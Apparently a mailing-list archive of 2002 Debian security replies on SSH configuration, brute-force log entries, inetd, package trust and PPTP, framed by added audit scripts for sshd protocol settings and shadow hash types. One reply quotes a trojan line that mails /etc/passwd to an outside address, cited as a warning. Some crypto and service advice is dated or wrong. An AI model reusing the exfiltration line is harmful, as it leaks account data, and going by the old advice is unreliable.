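    END { print (found ? value : def) }' "$1"
}

# Succeeds (exit 0) when the file still lets clients negotiate protocol 1.
ssh1_accepted() {
    case ",$(effective_protocol "$1")," in
        *,1,*) return 0 ;;
        *)     return 1 ;;
    esac
}

# Classifies the identification string a server sends on connect:
# "SSH-1.99-" means it speaks both 1 and 2, "SSH-2.0-" means 2 only,
# and any other "SSH-1.x-" means 1 only.
banner_protocols() {
    case "$1" in
        SSH-1.99-*) echo "1,2" ;;
        SSH-2.0-*)  echo "2" ;;
        SSH-1.*-*)  echo "1" ;;
        *)          echo "unknown" ;;
    esac
}

# Constructed sample configs: one with the directive only commented out,
# one where a correct first line shadows a later, weaker one.
demo() {
    dir=$(mktemp -d) || return 1
    printf '%s\n' '# Protocol 2' 'Port 22' 'PermitRootLogin no' > "$dir/commented"
    printf '%s\n' 'Port 22' 'protocol 2' 'Protocol 2,1' > "$dir/v2only"
    for f in commented v2only; do
        if ssh1_accepted "$dir/$f"; then
            state="protocol 1 still accepted"
        else
            state="protocol 2 only"
        fi
        echo "$f: Protocol $(effective_protocol "$dir/$f") ($state)"
    done
    # Constructed banner, as a server offering both versions would send it.
    echo "banner SSH-1.99-OpenSSH_3.0.2p1 -> $(banner_protocols 'SSH-1.99-OpenSSH_3.0.2p1')"
    rm -rf "$dir"
}

demo
```

After restarting sshd, a banner that has changed from `SSH-1.99-` to `SSH-2.0-` shows the running daemon picked up the setting.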





Re: SSH

2002-05-16 Thread Anne Carasik

It also depends if you've enabled MD5 passwords. If not, you
can only use up to 8 characters.

-Anne

This one time, Pawel Romanek wrote:
> 
> Hi !!
> 
> When I was playing with sshd I discovered
> that it checks only 8 (first) characters
> of my password, the remainder can be omitted ;)
> 
> Is it normal situation or my sshd 
> is configured incorrectly
> (i use default configuration from package) ?
> 
> ssh  -V shows:
> 
> OpenSSH_3.0.2p1 Debian 1:3.0.2p1-8, SSH protocols 1.5/2.0, OpenSSL 0x0090603f
> 
> Regards
> P.R.
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~



msg06763/pgp0.pgp
Description: PGP signature
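
Which case applies on a given box can be read from the hash field in /etc/shadow: a bare 13-character field is classic DES crypt(3), which uses only the first 8 characters of the password, while a field starting with `$1$` is MD5 crypt, which uses all of it. The classifier below is an added example, not part of the original posts; the shadow entries are constructed and are not real hashes.

```python
import re

SALT_CHARS = r"[./0-9A-Za-z]"
DES_RE = re.compile(rf"^{SALT_CHARS}{{13}}$")
MD5_RE = re.compile(rf"^\$1\${SALT_CHARS}{{1,8}}\${SALT_CHARS}{{22}}$")

# Constructed /etc/shadow content; the hash strings are placeholders.
SAMPLE_SHADOW = """\
root:$1$Qx3kLm9a$0123456789abcdefghijkl:11800:0:99999:7:::
alice:ab0123456789.:11820:0:99999:7:::
daemon:*:11800:0:99999:7:::
olduser:!cdABCDEFGHIJK:11700:0:99999:7:::
guest::11800:0:99999:7:::
"""


def classify_hash(field):
    """Name the scheme behind one shadow password field."""
    if field == "":
        return "empty"          # no password required at all
    if field[0] in "!*":
        return "locked"         # password login disabled
    if DES_RE.match(field):
        return "des-crypt"      # only the first 8 characters count
    if MD5_RE.match(field):
        return "md5-crypt"      # whole password is hashed
    return "other"


def audit_shadow(shadow_text):
    """Map each account name to the scheme of its password field."""
    result = {}
    for line in shadow_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue            # malformed entry, nothing to classify
        result[fields[0]] = classify_hash(fields[1])
    return result


def truncating_accounts(shadow_text):
    """Accounts whose passwords are checked on the first 8 characters only."""
    return [user for user, scheme in audit_shadow(shadow_text).items()
            if scheme == "des-crypt"]


def same_login_secret(scheme, typed, real):
    """True when `typed` would be accepted in place of `real`."""
    limit = 8 if scheme == "des-crypt" else None
    return typed[:limit] == real[:limit]


if __name__ == "__main__":
    print(audit_shadow(SAMPLE_SHADOW))
    print("truncating:", truncating_accounts(SAMPLE_SHADOW))
```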


Re: failed ssh breakins on my exposed www box ..

2002-03-24 Thread Anne Carasik
You could also TCP Wrap the services.

That drops the BS quite a bit. :)

-Anne

On Sun, Mar 24, 2002 at 11:44:26AM -0500, Gary MacDougall wrote:
> I get these all the time.
> 
> I've come to expect people to do this.  It sucks, but hey,
> what can you do.  I'm fed up trying to report and chase them down.
> 
> We seriously need a US branch of the law-enforcement to deal
> with this sort of stuff.  I think if more people got prosecuted for
> trying to crack into a site, the level of BS would drop to zero.
> 
> Yeah, yeah, you can argue all you want about cracking and how
> valuable it is to keep a product secure.  But if you apply that logic
> to the real world, robbing a bank wouldn't be a federal offense,
> and it would be like a speeding ticket...
> 
> g.
> 
> 
> - Original Message -
> From: "shiftee" <[EMAIL PROTECTED]>
> To: 
> Sent: Sunday, March 24, 2002 11:35 AM
> Subject: Re: failed ssh breakins on my exposed www box ..
> 
> 
> > Hi,
> >
> > To find out who owns the IP block you can do 'whois -h whois.arin.net
> '.
> >
> > I don't think reporting it would achieve anything, just a friendly
> > warning from the ISP to the user in question.
> >
> > On Sun, Mar 24, 2002 at 08:01:04AM -0800, Stephen Hassard wrote:
> > > sorta what I figured, but it was a pretty half assed attempt. :P
> > >
> > > on a side note, are these typically worth reporting to the ISP of the
> > > attacker? I tried doing a DNS lookup on the box in question, but it
> > > doesn't seem to have an FQDN registered. What's the best way to figure
> > > out the admin for a subnet from a machine's IP?
> > >
> > > Thanks,
> > > Steve
> > >
> > > shiftee wrote:
> > > > It just looks like someone is trying to brute-force an account, I'm
> > > > sure there are plenty of places that provide tools for this.
> > > >
> > > > Just make sure you enforce secure passwords, and keep an eye on your
> > > > syslog.
> > > >
> > > > On Sun, Mar 24, 2002 at 07:11:25AM -0800, Stephen Hassard wrote:
> > > >
> > > >>Hi there,
> > > >>
> > > >>I found these in my event log from yesterday:
> > > >>
> > > >> >>>
> > > >>Mar 23 09:33:16 www sshd[10998]: input_userauth_request: illegal user
> www
> > > >>Mar 23 09:33:18 www sshd[10998]: Failed none for illegal user www from
> > > >>213.26.96.103 port 2276 ssh2
> > > >>Mar 23 09:33:18 www sshd[10998]: Failed keyboard-interactive for
> illegal
> > > >>user www from 213.26.96.103 port 2276 ssh2
> > > >>Mar 23 09:33:18 www sshd[10998]: Failed password for illegal user www
> > > >>from 213.26.96.103 port 2276 ssh2
> > > >>Mar 23 09:33:19 www sshd[10997]: input_userauth_request: illegal user
> oracle
> > > >>Mar 23 09:33:19 www sshd[10997]: Failed none for illegal user oracle
> > > >>from 213.26.96.103 port 2275 ssh2
> > > >>Mar 23 09:33:19 www sshd[10997]: Failed keyboard-interactive for
> illegal
> > > >>user oracle from 213.26.96.103 port 2275 ssh2
> > > >>Mar 23 09:33:19 www sshd[10997]: Failed password for illegal user
> oracle
> > > >>from 213.26.96.103 port 2275 ssh2
> > > >>Mar 23 09:33:19 www sshd[10999]: input_userauth_request: illegal user
> test
> > > >>Mar 23 09:33:19 www sshd[10999]: Failed none for illegal user test
> from
> > > >>213.26.96.103 port 2277 ssh2
> > > >>Mar 23 09:33:19 www sshd[10999]: Failed keyboard-interactive for
> illegal
> > > >>user test from 213.26.96.103 port 2277 ssh2
> > > >>Mar 23 09:33:20 www sshd[10999]: Failed password for illegal user test
> > > >>from 213.26.96.103 port 2277 ssh2
> > > >><<<
> > > >>
> > > >>It seems that from the timestamp that it's most likely a script kiddy;
> > > >>The time duration between failed password attempts seems really short.
> > > >>I'm just wondering if anyone's seen a script that does this and is
> > > >>available widely, or is it a good chance that I've got someone trying
> to
> > > >>break in? None of my other services seem to have been probed, just
> ssh.
> > > >>
> > > >>Thanks,
> > > >>Steve
> > > >>
> > > >>
> >

Re: A question about some network services

2002-04-02 Thread Anne Carasik
On Tue, Apr 02, 2002 at 07:45:21PM +0200, eim wrote:
> A question about some network services
> ==
> 
> Hallo Debian folks,
> 
> By default, on my debian boxes, I disable these network
> services which are enabled automatically during a fresh
> Debian stable aka "potato" installation:
> 
>   * daytime
>   * time
>   * discard
> 
> All these services are started from inet.d / xinet.d
> so I can easily disable them via "update-inetd", 
> so my only question is: 
> 
>   Why are these services enabled by default and
>   for 'what' exactly do we need them ?

Well, daytime spits out the time of day, time is for NTP,
and I'm not sure what discard is used for.

I usually turn off inetd completely. It helps make things
quieter on a nessus scan :)

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpfvuUCjhJ8x.pgp
Description: PGP signature


Re: A question about some network services

2002-04-04 Thread Anne Carasik
On Tue, Apr 02, 2002 at 01:34:32PM -0500, Noah L. Meyerhans wrote:
> > Well, daytime spits out the time of day, time is for NTP,
> > and I'm not sure what discard is used for.
> No, NTP does not use the time port.  It uses port 123 (ntp in
> /etc/services).

Ok, figures I don't know since I don't use it.

> Discard is the network equivalent of /dev/null

W.. an MTU of zero :)

> The question of what to do with these ports comes up every once in a
> while on this list.  Some people prefer to leave them on, others turn
> them off.  I don't think there's ever been an exploit that involves
> these ports, as the code is quite simple (i.e. easy to implement
> securely).

Occasionally, there may be a DOS attack, but nothing invasive.

> > I usually turn off inetd completely. It helps make things
> > quieter on a nessus scan :)
> Yes, this is good advice, and something that never occurs to most
> people.  Most common services these days run quite happily in standalone
> mode, so there's often no reason to use inetd at all.

Given most everything can run through SSH or SSL (at least TCP-based) :)

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpTYNkc4r1PK.pgp
Description: PGP signature


Re: A question about some network services

2002-04-05 Thread Anne Carasik
Generally, I just disable the inetd script from the /etc/init.d
directory.

You never know if you're going to need it. Removing the package
is definitely not the same as disabling it.

Michal is right: disable <> wipe it out :)

-Anne

On Fri, Apr 05, 2002 at 04:31:19PM +0200, Michal Melewski wrote:
> > Yikes! I guess, you didn't remove inetd that way, right? But how then?
> I think that you should just turn it off :)
> 'Don't' use isn't equal to 'wipe it out' 
> 
> > Namarie!
> > Juku
> 
> -- 
> Michael "carstein" Melewski|  "One day, he said, in a taped segment   
> [EMAIL PROTECTED]  |   that suggested chemical interrogation,
> mobile:   502 545 913  |   everything had gone gray."
> gpg: carstein.c.pl/carstein.txt|   -- Corto , 'Neuromancer'



-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgp7ISHyL7swr.pgp
Description: PGP signature


Re: does virus ELF.OSF.8759 affect debian?

2002-04-10 Thread Anne Carasik
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
> And another reason not to run as root...

Compile from source is a good idea too. It's amazing what you
can find in the source. I found a couple of stupid Trojans
that way.

   system("mail /etc/passwd [EMAIL PROTECTED]");

*sigh*

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpbVsN8QcvSy.pgp
Description: PGP signature


Re: does virus ELF.OSF.8759 affect debian?

2002-04-10 Thread Anne Carasik
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote:
> > Basically, if you run binaries from an unsafe source, you get what you
> > deserve.
> 
> Man, I try to be an honest individual, I hope I don't deserve something
> like that !
> 
> ..., Is there such a thing as a 100% safe source for binaries ?

Check the PGP key (or GnuPG key) and the md5 checksum from the source
(as long as you trust the source).

Even trusted sources (like ftp.porcupine.org/pub/security) get hit
with Trojan horses. Always check the digital signatures and the
checksums!

Debian does this when you do an apt-get, I believe.

-Anne
-- 

      .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpWJvL0nK50k.pgp
Description: PGP signature


Re: Bastian Gl??er/PD/Kreditwerk is out of the office.

2002-04-12 Thread Anne Carasik
No Perl? ;)

-Anne

On Fri, Apr 12, 2002 at 10:09:27PM +0300, Edmunds wrote:
> Hi All,
> 
> I know that Debian origin is Deutschland, but for a good style in mailing
> lists I think we should use English or C :)
> 
> Debian user
> 
> 
> - Original Message -
> From: "Dennis Stampfer" <[EMAIL PROTECTED]>
> To: "Bastian Gl??er" <[EMAIL PROTECTED]>;
> 
> Sent: Friday, April 12, 2002 8:49 PM
> Subject: Re: Bastian Gl??er/PD/Kreditwerk is out of the office.
> 
> 
> > On Fri, Apr 12, 2002 at 08:33:06PM +0200, Bastian Gl??er wrote:
> > > I will be out of the office from 26.03.2002. I will return on
> > > 23.12.2024.
> > >
> > > I will no longer reply to your message at all.
> >
> > oh, no. Will that autoreply continue to 2024?
> >
> >
> > --
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
> >
> >
> >
> >
> 
> 
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgptE4wmsEuW5.pgp
Description: PGP signature


Re: does virus ELF.OSF.8759 affect debian?

2002-04-17 Thread Anne Carasik
On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote:
> Anne Carasik <[EMAIL PROTECTED]> wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> > 
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Oh shit, that's evil. Where did you manage a software including this
> kind of source code in first place? Don't say freshmeat.net! Or
> sourceforge.net... I'm glad you were able to detect this and not run
> the software. 

I can't remember, other than some obviously suspect code. It was an ssh
trojan, if I remember correctly.

> Big sigh, indeed. I hate these script kiddies, crackers and people,
> who only does harm to other people online. Was it a take-over of
> an IRC channel, breaking to someone's system or whatever. I just
> hate these people. I've never seen computer, internet connection and
> everything related as a tools to cause harm and destruction. It's
> beyond me, what satisfaction does these persons get...

I don't think they have anything better to do (at least the script
kiddies). Some groups, like in the Middle East and China, feel that 
they have a sudden interest in attacking US sites.

However, I'm sure there are other groups attacking the Middle East and
China as well.

You should see some of the stupid stuff script kiddies leave on the
systems--they don't even change the mtime or the logs, not to mention
leave the code behind with URLs in it.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpfYfAp4Cex0.pgp
Description: PGP signature


Re: does virus ELF.OSF.8759 affect debian?

2002-04-17 Thread Anne Carasik
On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Yeh, and it's buggy too
> Take a close look at what really happens.

I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;)

Seriously, I know it is. The other thing is, I use shadow most of the
time. Still, the username information is never a good thing to share.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpWnq6XAr2NO.pgp
Description: PGP signature


Re: Guarding against evil software installation scripts?

2002-04-18 Thread Anne Carasik
Dude, and I thought I'm paranoid :)

Even I trust the debian sources in /etc/apt/sources.list,
not without the PGP key or MD5 of course.

Just make sure the digital signature and/or MD5 checksum
comes from a trusted source. 

Unless, of course, you want to write your own code. :)

-Anne

On Wed, Apr 17, 2002 at 09:52:24PM -0700, Tim Freeman wrote:
> At the moment my system has 876 packages installed.  They were all
> installed by root.  Each package gets a chance to run an arbitrary
> shell script as root, so it seems to me that there must have been much
> more than 876 opportunities for my system to get utterly destroyed by
> absolute strangers.  So far, none of them decided to do me in.  It's
> surprising it all works so well.
> 
> This leads to some questions:
> 
> 1. Have there been problems with people submitting malicious packages,
>or packages that were so buggy they might have well been malicious?
>If so, what happened?
> 
> 2. Are there any ideas about how to tighten this up a bit?  Here are
>some vague ideas:
> 
> 2a. I can vaguely imagine something where many packages run their
>installation scripts under a user id unique to that package, so the
>installation script is therefore unable to arbitrarily destroy
>everything.  
> 
> 2b. It might be possible to do it with only one special user id for
>package installs, where a root process chowns everything owned by
>the package after the install script is complete, and chowns it
>back before an uninstall script runs.  You'd need a separate
>database that lists which files got chowned so you'll know to chown
>them back later.
> 
> 2c. Perhaps something like XFS access lists could be used (if everyone
>were running XFS) or SELinux or LIDS (where did the .deb for LIDS go,
>by the way?)  I have no experience with any of these, so this may be
>nonsense. 
> 
> I don't see a clear path to doing this the "right" way, where chaos is
> prevented by something more substantial than a social convention.  
> 
> I have to admit that the social convention is working very well at the
> moment, though.
> 
> -- 
> Tim Freeman   
> [EMAIL PROTECTED]
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpIzTjkKrLVy.pgp
Description: PGP signature


Re: Lost root password!!

2002-04-23 Thread Anne Carasik
On Mon, Apr 22, 2002 at 04:12:02PM -0600, Stefan Srdic wrote:
> Last night when I attempted to change my root password passwd bunked out on 
> me. It crashed and I received the following message on the console:
> 
> passwd: Critical error - immediate abort

Ooo...

> I thought that I could still use my old root password but cannot. I attempted 
> to boot straight into a shell (init=/bin/sh) and manually expire my root 
> password (so that I could change it on the next login) and ended up with the 
> same results. I've also tried deleting the root passwd to see if I could then 
> re-run passwd as root and change my passwd. No luck.

Have you used a rescue disk or installation CD?

> I can still log into my system as a normal user but cannot change any users 
> passwords, I get the same error message as above.

Does your /etc/passwd or /etc/shadow have invalid entries, or has it
gotten corrupted?

> Is passwd in Woody broken? How can I fix my broken root password without 
> harming my system? 

I hope not :(

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgp7XDkgpyrUH.pgp
Description: PGP signature


Re: disable RPC

2002-04-24 Thread Anne Carasik
Try 

# apt-get remove --purge pkgname

That will remove anything related to the package (sometimes,
the directories aren't removed like /etc/pkgname).

Also, try 

# dpkg --get-selections | grep -i portmap

To see other packages related to RPCs..

-Anne

On Wed, Apr 24, 2002 at 11:26:16AM -0400, Andrew Kaplan wrote:
> How do I disable RPC. I know the scripts can be removed from init.d But I
> know there's a command similar to "apt-get remove ???" or something similar.
> That removes it completely.
> 
> Andrew P. Kaplan
> Network Administrator
> CyberShore, Inc.
> http://www.cshore.com
> 
> 
> "Somehow I imagined this experience would be more rewarding"  Calvin
> 
> 
> 
> 
> 
> 
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.332 / Virus Database: 186 - Release Date: 3/6/02
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpYht4hk8n4I.pgp
Description: PGP signature


Re: PPTP with Encryption

2002-04-30 Thread Anne Carasik
Last time I checked, PPTP comes with encryption. All you
have to do is configure it.

From Freshmeat:
PoPToP
 
About:
PoPToP is a PPTP server for use in PPTP VPN environments. The current
release version supports Windows 95/98/NT/2000 PPTP clients and PPTP
Linux clients. With the relevant patches, PoPToP supports Windows PPTP
clients with the full range of encryption and authentication features. 

From apt-cache:
pptpd - PoPToP Point to Point Tunneling Server

I don't think you should have any patching to do. :) The home page
for poptop is at http://www.poptop.org.

-Anne

On Tue, Apr 30, 2002 at 10:54:24AM -0400, Derek J. Balling wrote:
> Does anyone have a nice simple HOWTO on how to add encryption to the 
> pptpd daemon, so that windows VPN users can connect using encryption? 
> Preferred methods do NOT include patching things, if possible, 
> because I'd like to not have to re-patch things every time new 
> upgrades come out.
> 
> Has anyone built all the necessary items simply as .deb's?
> 
> D
> 
> -- 
> +-+-+
> | [EMAIL PROTECTED]  | "Thou art the ruins of the noblest man  |
> |  Derek J. Balling   |  That ever lived in the tide of times.  |
> | |  Woe to the hand that shed this costly  |
> | |  blood" - Julius Caesar Act 3, Scene 1  |
> +-+-+
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact 
> [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpoTiz2GzaBc.pgp
Description: PGP signature


Re: PPTP with Encryption

2002-04-30 Thread Anne Carasik
On Tue, Apr 30, 2002 at 12:03:09PM -0400, Derek J. Balling wrote:
> >I don't think you should have any patching to do. :) The home page
> >for poptop is at http://www.poptop.org.
> Not unless the packaged pptpd/ppp has something else, from the poptop.org 
> page:
> # Available PPPD patch allows Windows compatible encryption and 
> authentication (MSCHAPv2 and MPPE 40-128 bit RC4 encryption)

You're right.. (I guess you do want to encrypt to a Windows box, so
make sure you're using full strength RC4.. 40 bit keys can be brute
forced).

According to the poptop FAQ:
3.0 PPP (and MSCHAPv2/MPPE) Installation

It is only necessary to use PPP 2.3.8 if you want Microsoft compatible
MSCHAPv2/MPPE authentication and encryption. The reason for this is that
the MSCHAPv2/MPPE patch currently supplied (19990813) is against PPP
2.3.8. If you don't need Microsoft compatible authentication/encryption
any 2.3.x PPP source will be fine.

[...]

The instructions look like you need to make a kernel module. 

> So it seems like there's SOMETHING I need to add to pppd to get 
> encryption to work with it, and (from my reading) it seems like 
> there's a patch that also needs to go in the kernel to make that pppd 
> change work as well.

Out of curiosity, why PPTP? Why not IPSec? There's better compatibility
with IPSec (FreeSWAN), and it looks like poptop hasn't been updated in a
long time (since 1999). Also, Win2K and I think (don't quote me on this)
WinXP have builtin IPSec support.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpx2WQb2HIoE.pgp
Description: PGP signature


Re: PPTP with Encryption

2002-04-30 Thread Anne Carasik
On Tue, Apr 30, 2002 at 01:24:21PM -0400, Derek J. Balling wrote:
> >As a side note: have you considered that using the encryption in pptp
> >forces you to store userpasswords in cleartext? For my ISP [1] that was
> >a reason not to use pptp's encryption, especially since MS-CHAPv2
> >contains known security holes [2].
> 
> Yes, unfortunately, for our predominant workstation (Win98), M$'s 
> PPTP client is ubiquitous and other solutions are not necessarily so 
> commonly deployed.
> 
> D
> (who would LOVE to move to a _MORE_ secure solution, but is content, 
> for now, to only allow himself and one other to even have accounts on 
> the box with the cleartext passwds)

Ugh.. I'd never be content with cleartext passwords, especially given
how many security solutions are around today.

-Anne
--
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpWoXwofngwG.pgp
Description: PGP signature


Re: Safe to use Mindterm?

2002-05-13 Thread Anne Carasik
Security issues? Can you be more specific?

There aren't any security issues (yet) with the SSH 2.0 protocol.

From what I know, there aren't any issues using mindterm for 2.0
either :)

-Anne

This one time, Preben Randhol wrote:
> Hi
> 
> I'm looking for a way to log into my computer via ssh and a web browser.
> I see mindterm can do this, but last I checked it used ssh < 2.0, and I
> understood that there were security issues with this. Is that correct? 
> Are there any replacement software for mindterm?
> 
> Thanks of any hints in advance!
> 
> Preben
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpE7qh1XXUVO.pgp
Description: PGP signature


Re: Safe to use Mindterm?

2002-05-13 Thread Anne Carasik
I thought there was.. Appgate is charging for it?!?

How sad, and they don't even list the price. *Sigh*

-Anne

This one time, Preben Randhol wrote:
> Thanks for your information, it was that I was looking for. I guess
> there are no mindterm clones out there with SSH 2.0 support (Open
> Source/Free Software of course)?
> 
> 
> -- 
> Preben Randhol --- http://www.pvv.org/~randhol/ --
>  "For me, Ada95 puts back the joy in programming."
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpzSA0EiWzFy.pgp
Description: PGP signature


Re: PGP Keyserver

2002-06-06 Thread Anne Carasik
Here's a whole slew listed at:

http://www.openpgp.net/pgpsrv.html

-Anne

This one time, Phillip Hofmeister wrote:
> All,
> 
> There may be a thread on this topic...somewhere...
> 
> But, is there a fairly populated pgp keyserver besides
> wwwkeys.pgp.net?
> 
> Thanks,
> 
> Phil
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpJLOLTZmRv5.pgp
Description: PGP signature


Re: SSH2 Encryption

2002-06-10 Thread Anne Carasik
Hi Jeff,

This one time, Jeff Bonner wrote:
> I've been playing around with a Woody installation, connecting to it via
> SSH2, with SecureCRT 3.4 for Win32.  I think I've finally figured out what
> encryption types this Debian package (ssh 3.0.2p1-9) supports, but please 
> correct me if I'm wrong -- http://www.openssh.org/features.html lists *only* 
> 3DES and Blowfish:
>   AES-128
>   AES-192
>   AES-256 (isn't this Rijndael now?)
>   Triple DES
>   Blowfish
>   RC4
>   rijndael-128cbc
>   rijndael-192cbc
>   rijndael-256cbc
>   [EMAIL PROTECTED] [sic]
>   CAST-128cbc

Check the man page for what ciphers SSH2 accepts. I usually leave it on
Blowfish because it's secure and it's the fastest cipher. AES sucks
because it's dog slow, and it doesn't buy you that much more security
than Blowfish.

> Also, there's an option in SecureCRT called "MAC" which I guess refers
> to the
> hash:  MD5, SHA1, MD5-96, and SHA1-96.

Pick SHA1 or SHA1-96. MD5 has been broken (or it's close to).

> Questions:
> 
> 1) Are all those ciphers actually available in my SSH package?

Yep, as long as you have OpenSSL support :)

> 2) The SHA1-96 hash should be better than MD5-96, correct?

Correct.

> 3) Any reason you *wouldn't* want to use compression in SSH?

Yes, if you're going over a high speed line, no reason to use
compression. If you're connecting through a slow line (like a
modem), use compression.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpddVAxohnvS.pgp
Description: PGP signature


Re: SSH2 Encryption

2002-06-10 Thread Anne Carasik
This one time, Jeff Bonner wrote:
> On Mon 10 Jun 2002 13:23, Anne Carasik wrote:
> > This one time, Jeff Bonner wrote:
> As in, "This one time, at band camp..."?  >;)  Also, sorry about
> the wretched linebreaks, folks.  Good ol Outlook.

Yes, exactly. :) I got tired of the typical attribution line.

> Well, the manpage for ssh(1) shows the following, under SSH2:
> 
>"Protocol 2 provides additional mechanisms for
>confidentiality (the traffic is encrypted using
>3DES, Blowfish, CAST128 or Arcfour) and integrity
>(hmac-md5, hmac-sha1)"
> 
> However, it seems this package does support all the ones I had
> given originally, as I mention in my reply to Mark Janssen on
> this list; they showed up in my daemon.log later.

Yep. Same with mine. Under Ciphers doesn't provide you with much more
either *sigh*.

> After reading the manpage to quote above, I noticed that it's
> only applicable to SSH1 anyway, so I guess it doesn't matter.
> :)

What, compression? Compression should work with both SSH1 and SSH2
protocols.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpYzTwKBtG61.pgp
Description: PGP signature


Re: SSH2 Encryption

2002-06-17 Thread Anne Carasik
This one time, Loic Le Loarer wrote:
> On Monday 10 June 2002 at 10:23:23 -0700, Anne Carasik wrote:
> > Check the man page for what ciphers SSH2 accepts. I usually leave it on
